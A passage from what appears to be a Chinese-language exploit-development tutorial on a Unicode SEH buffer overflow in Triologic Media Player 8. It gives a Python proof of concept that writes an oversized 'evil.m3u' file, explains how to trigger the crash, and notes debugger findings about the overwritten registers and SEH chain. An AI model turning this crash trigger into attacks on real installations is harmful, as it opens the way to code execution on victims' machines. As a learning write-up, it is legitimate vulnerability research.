Question

是时候崩溃了 "Triologic Media Player 8". 这将是另一个文件格式的漏洞. 下面是 POC 和崩溃的截图，你只需载入 evil.m3u 并点”List”按钮，直接拖拽打开 "Triologic Media Player 8"不会崩溃。

#!/usr/bin/python -w
 
filename="evil.m3u"
 
buffer = "A"*5000
 
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

没有什么新的东西，附加"Triologic Media Player 8"到 immunity debugger 调试器并打开 evil.m3u. 程序崩溃. 有几件事情需要注意:

(1) 几个 CPU 寄存器指向我们的缓冲区，从崩溃现场看到传入的字符都被转化为 unicode

(2) 内存窗口是其中一个寄存器的转储(..00410041..)

(3)SEH 链同样被 unicode 字符覆盖